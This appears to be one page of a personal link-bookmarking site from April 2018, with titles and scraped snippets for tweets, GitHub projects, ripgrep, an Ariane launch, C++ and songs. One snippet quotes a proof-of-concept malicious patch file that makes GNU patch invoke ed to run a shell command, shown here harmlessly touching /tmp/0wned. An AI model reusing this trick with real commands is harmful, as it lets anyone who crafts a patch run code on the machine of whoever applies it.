« 346 347 348 349 350 1506 »

Pages are deceptive. Live life in a basket.

ruben🐭ferdinand on Twitter: "hands trembling, fearing for my life, I type into an incognito search bar 'naruto president 2022?' the CIA kills me before I can press enter"

Skip to content Home Home Home, current page. Moments Moments Moments, current page. Search query Search Twitter Remove In this conversation Verified account Protected Tweets @ Suggested users Verified account Protected Tweets @ Verified account Protected Tweets @ Language: English Bahasa Indonesia Bahasa Melayu Català Čeština Dansk Deutsch English UK Español Filipino Français Hrvatski Italiano Magyar Nederlands Norsk Polski Português Română Slovenčina Suomi Svenska Tiếng Việt Türkçe Ελληνικά Български език Русский Српски Українська мова עִבְרִית العربية فارسی मराठी हिन्दी বাংলা ગુજરાતી தமிழ் ಕನ್ನಡ ภาษาไทย 한국어 日本語 简体中文 繁體中文 Have an account? Log in Have an account? Remember me · Forgot password? New to Twitter? Sign up ...

Linked on 2018-04-06 19:23:29 | Similar Links
BurntSushi (Andrew Gallant) · GitHub

Skip to content Features Business Explore Marketplace Pricing '"` </textarea></xmp> Sign in or Sign up BurntSushi Follow Andrew Gallant BurntSushi I love to code. Block or report user '"` </textarea></xmp> Hide content and notifications from this user. Block user Contact Support about this user's behavior. Report abuse @diffeo Marlborough, MA http://burntsushi.net Overview Repositories 132 Stars 260 Followers 1.5k Following 1 rust-lang / regex An implementation of regular expressions for Rust. This implementation uses finite automata and guarantees linear time matching on all inputs. Rust 683 132 ripgrep ripgrep recursively searches directories for a regex pattern Rust 8.5k 337 xsv A fast CSV command line toolkit written in Rust. Rust ...

Linked on 2018-04-05 22:46:45 | Similar Links
Ariane Flight VA242 – Arianespace

ariane launch in 5

This website uses cookies. By continuing to browse the website, you are agreeing to our use of cookies. More information . About About us Governance Company profile Sustainable development Ready to launch Launch status The Spaceport Launch Vehicles Ariane 5 Soyuz Vega Vega C Ariane 6 News Gallery Careers Press Contact overview mission description payload countdown & flight gallery mission update Choose language EN FR Live <div id="player_video_english" data-video="https://ebu-emp.ebu.ch/arianespace/embedded.html?tag=bGl2ZTsyMDc&#038;autoplay=true" class="content--video js-jwPlayer-wrapper"></div> <div id="player_video_french" data-video="https://ebu-emp.ebu.ch/arianes...

Linked on 2018-04-05 22:30:20 | Similar Links
ripgrep is faster than {grep, ag, git grep, ucg, pt, sift} - Andrew Gallant's Blog

Andrew Gallant's Blog About Projects GitHub Sep 23, 2016 In this article I will introduce a new command line search tool, ripgrep , that combines the usability of The Silver Searcher (an ack clone) with the raw performance of GNU grep. ripgrep is fast, cross platform (with binaries available for Linux, Mac and Windows) and written in Rust . ripgrep is available on Github . We will attempt to do the impossible: a fair benchmark comparison between several popular code search tools. Specifically, we will dive into a series of 25 benchmarks that substantiate the following claims: For both searching single files and huge directories of files, no other tool obviously stands above ripgrep in either performance or correctness. ripgrep is the only tool with proper Unicode support that doesn’t make you pay dearly for it. Tools that search many files at once are generally slo...

Linked on 2018-04-05 22:23:13 | Similar Links
GitHub - etsy/hound: Lightning fast code searching made easy

Skip to content Features Business Explore Marketplace Pricing '"` </textarea></xmp> This repository Sign in or Sign up Watch 134 Star 3,636 Fork 370 etsy / hound Code Issues 63 Pull requests 24 Projects 0 Wiki Insights '"` </textarea></xmp> Dismiss GitHub is home to over 20 million developers working together to host and review code, manage projects, and build software together. Sign up Lightning fast code searching made easy 213 commits 8 branches 2 releases 39 contributors MIT JavaScript 71.0% Go 25.9% CSS 2.6% Other 0.5% JavaScript Go CSS Other Clone or download Use Git or checkout with SVN using the web URL. Download ZIP ... If nothing happens, download GitHub Desktop and try again. Go ba...

Linked on 2018-04-05 21:53:06 | Similar Links
patch runs ed, and ed can run anything

Writing Software, technology, sysadmin war stories, and more. Thursday, April 5, 2018 Okay, this is kind of awesome, if you like watching the world burn. The short version is: patch runs ed... and ed can run arbitrary commands, including when it's called from patch. Check this out. I've taken the proof of concept and changed it slightly: $ cat evil.patch --- /dev/null 2018-13-37 13:37:37.000000000 +0100 +++ b/beep.c 2018-13-37 13:38:38.000000000 +0100 1337a 1,112d !touch /tmp/0wned; ls -la /tmp/0wned . $ patch < evil.patch ? ? -rw-r--r-- 1 edu users 0 Apr 5 10:42 /tmp/0wned ? patch: **** /u...

Linked on 2018-04-05 21:43:29 | Similar Links
No New New: Raw Pointers Removed from C++ - ModernesCpp.com

Need this wrapper for off-canvas menu. Remove if you don't use of-canvas MAIN NAVIGATION OFF-CANVAS //OFF-CANVAS NAVBAR HEADER LOGO //LOGO HEAD SEARCH Search ... //HEAD SEARCH //NAVBAR HEADER NAVBAR MAIN Modernes C++ //NAVBAR MAIN //MAIN NAVIGATION MAIN CONTENT 26 March 2018 Tweet Contents [ Show ] The evolution of pointers in C++ std::unique_ptr to our rescue Ownership semantic What's next? Further Information Get your e-book at leanpub: The C++ Standard Library Concurrency With Modern C++ Get Both as one Bundle Two weeks ago, the ISO C++ standard meeting took place in Jacksonville.  Today I want to make a short detour and write about the revolutionary decision that was made in the Jacksonville meeting. Additionally, I refer to the post C++ Will no Longer Have Pointers by Fluent C++. The standard co...

Linked on 2018-04-05 20:47:17 | Similar Links
Turning a MacBook into a Touchscreen with $1 of Hardware · cat /var/log/life

# Anish Athalye Home About Archive Projects © 2018. All rights reserved. 03 Apr 2018 · 4 min read — shared on Hacker News , Lobsters , Reddit and Twitter We turned a MacBook into a touchscreen using only $1 of hardware and a little bit of computer vision. The proof-of-concept, dubbed “Project Sistine” after our recreation of the famous painting in the Sistine Chapel, was prototyped by me, Kevin , Guillermo , and Logan in about 16 hours. The basic principle behind Sistine is simple. Surfaces viewed from an angle tend to look shiny, and you can tell if a finger is touching the surface by checking if it’s touching its own reflection. Kevin, back in middle school, noticed this phenomenon and built ShinyTouch , utilizing an external webcam to build a touch input system requiring virtually no setup. We wanted to see if we could miniaturize the idea...

Linked on 2018-04-05 18:25:12 | Similar Links
Churn, baby, churn!

close this window jump to content my subreddits edit subscriptions popular - all - random - users | AskReddit - worldnews - videos - funny - todayilearned - pics - gaming - movies - news - gifs - mildlyinteresting - aww - Showerthoughts - television - Jokes - science - OldSchoolCool - sports - IAmA - Documentaries - TwoXChromosomes - explainlikeimfive - personalfinance - books - tifu - Futurology - dataisbeautiful - WritingPrompts - nottheonion - food - Music - photoshopbattles - EarthPorn - philosophy - Art - nosleep - GetMotivated - askscience - LifeProTips - space - UpliftingNews - DIY - history - gadgets - creepy - listentothis - blog - announcements - InternetIsBeautiful more » reddit.com churning hot new rising controversial top gilded wiki Want to join? Log in or sign up in seconds. | English limit my search to r/churning use the following search parameters to narrow your result...

Linked on 2018-04-05 18:03:22 | Similar Links
Kate Darling on Twitter: "My husband just asked Alexa to play Dead Kennedys and then got sad for a minute that “this is how we listen to punk rock now.”"

Skip to content Home Home Home, current page. Moments Moments Moments, current page. Search query Search Twitter Remove In this conversation Verified account Protected Tweets @ Suggested users Verified account Protected Tweets @ Verified account Protected Tweets @ Language: English Bahasa Indonesia Bahasa Melayu Català Čeština Dansk Deutsch English UK Español Filipino Français Hrvatski Italiano Magyar Nederlands Norsk Polski Português Română Slovenčina Suomi Svenska Tiếng Việt Türkçe Ελληνικά Български език Русский Српски Українська мова עִבְרִית العربية فارسی मराठी हिन्दी বাংলা ગુજરાતી தமிழ் ಕನ್ನಡ ภาษาไทย 한국어 日本語 简体中文 繁體中文 Have an account? Log in Have an account? Remember me · Forgot password? New to Twitter? Sign up ...

Linked on 2018-04-05 13:13:09 | Similar Links
Leg so hot - Imgur

we're hiring! blog about imgur imgur store imgur apps developer api advertise need help? terms privacy ad choices Upload Images Video to GIF Make a Meme New post sign in sign up #secondary-nav .header-center #topbar Uploaded 10h Love Imgur? Join our team! about store help blog terms privacy apps api advertise ad choices report ad request deletion community rules forum TAKE ME UP No way! I'm sure hide post details Use old embed code Copy and paste the HTML below into your website: Theme: Dark Light Custom Preview Background: # Text: # Link: # Hide Thumbnails: Hide old embed code ...

Linked on 2018-04-05 06:57:44 | Similar Links
GitHub - iliasam/OpenSimpleLidar: Open Hardware scanning laser rangefinder

Skip to content Features Business Explore Marketplace Pricing '"` </textarea></xmp> This repository Sign in or Sign up Watch 31 Star 628 Fork 32 iliasam / OpenSimpleLidar Code Issues 0 Pull requests 1 Projects 0 Wiki Insights '"` </textarea></xmp> Dismiss GitHub is home to over 20 million developers working together to host and review code, manage projects, and build software together. Sign up Open Hardware scanning laser rangefinder lidar stm32 ros diy 35 commits 1 branch 0 releases 2 contributors C 99.0% Other 1.0% C Other Clone or download Use Git or checkout with SVN using the web URL. Download ZIP ... If nothing happens, download GitHub Desktop and try again. Go back ... If nothing happens, d...

Linked on 2018-04-05 02:49:49 | Similar Links
modern-project-management

This is a dumb hack, we should only have one or the other from the the template context, so only one of the following will be rendered. ...

Linked on 2018-04-04 23:30:32 | Similar Links
Be Quiet and Drive (Far Away), a song by Deftones on Spotify

This browser doesn't support Spotify Web Player. Switch browsers or download Spotify for your desktop. Deftones 1997 • 1 song, 4:59 Play on Spotify 1. Be Quiet and Drive (Far Away) 4:59 0:30 Featured on Around The Fur Gore Koi No Yokan Koi No Yokan Covers Diamond Eyes More Deftones Listen to Deftones in full in the Spotify app Play on Spotify © 1997 Maverick Recording Company ℗ 1997 Maverick Recording Company Legal Privacy Cookies About Ads To play this content, you'll need the Spotify app. Get Spotify Open Spotify Listen to all your favourite artists on any device for free or try the Premium trial. Play on Spotify...

Linked on 2018-04-04 23:14:08 | Similar Links
D @ Papa Murphys - missed connections

CL portland > clark/cowlitz > community > missed connections post account favorites hidden CL ... ◀ prev ▲ next ▶ reply ✉ reply x prohibited [ ? ] Posted 2018-03-30 4:30pm Contact Information: print favorite this post D @ Papa Murphys (Hazeldel) hide this posting unhide QR Code Link to This Post David, you make my Friday night pizza order better. Sorry for the lack of eye contact. I'm usually to baked and when I look at you, I want to smile. do NOT contact me with unsolicited services or offers post id: 6547721475 posted: 2018-03-30 4:30pm email to friend ♥ best of [ ? ] © craigslist CL help safety privacy feedback cl jobs terms new about mobile desktop ...

Linked on 2018-04-04 22:45:45 | Similar Links
why-isnt-it-three-thirty-yet

This is a dumb hack, we should only have one or the other from the the template context, so only one of the following will be rendered. true ...

Linked on 2018-04-04 22:39:36 | Similar Links
Neurotic, a song by Hundredth on Spotify

This browser doesn't support Spotify Web Player. Switch browsers or download Spotify for your desktop. Hundredth 2017 • 1 song, 3:37 Play on Spotify 1. Neurotic 3:37 0:30 Featured on RARE Free Let Go When Will We Surrender RARE B-Sides Hole More Hundredth Listen to Hundredth in full in the Spotify app Play on Spotify © 2017 Hopeless Records, Inc. ℗ 2017 Hopeless Records, Inc. Legal Privacy Cookies About Ads To play this content, you'll need the Spotify app. Get Spotify Open Spotify Listen to all your favourite artists on any device for free or try the Premium trial. Play on Spotify...

Linked on 2018-04-04 21:32:05 | Similar Links
This Guy Converted A Subaru Race Car Into His Street-Legal Daily Driver And It's A Riot

md5! The A.V. Club Deadspin Earther Gizmodo Jalopnik Jezebel Kotaku Lifehacker Splinter The Takeout The Root The Onion Video Jalopnik Reviews The Morning Shift Nice Price Or Crack Pipe Podcasts What Car Should You Buy Video Jalopnik Reviews The Morning Shift Nice Price Or Crack Pipe Podcasts What Car Should You Buy All photos credit Ken Saito A Car Nerd's Guide To Japan This Guy Converted A Subaru Race Car Into His Street-Legal Daily Driver And It's A Riot All photos credit Ken Saito Photo: Ken Saito Ken Saito Yesterday 10:17am Filed to: A Car Nerd's Guide To Japan Filed to: A Car Nerd's Guide To Japan A Car Nerd's Guide To Japan subaru subaru impreza subaru wrx subaru 22b 162 28 Edit Send to Editors Promote Share to Kinja Go to permalink It’s an usually warm spring day in Tokyo. After a few days of winter refusing to relinquish the cold weather, we suddenly experienced temperatures in...

Linked on 2018-04-04 17:07:41 | Similar Links
« 346 347 348 349 350 1506 »

Pages are deceptive. Live life in a basket.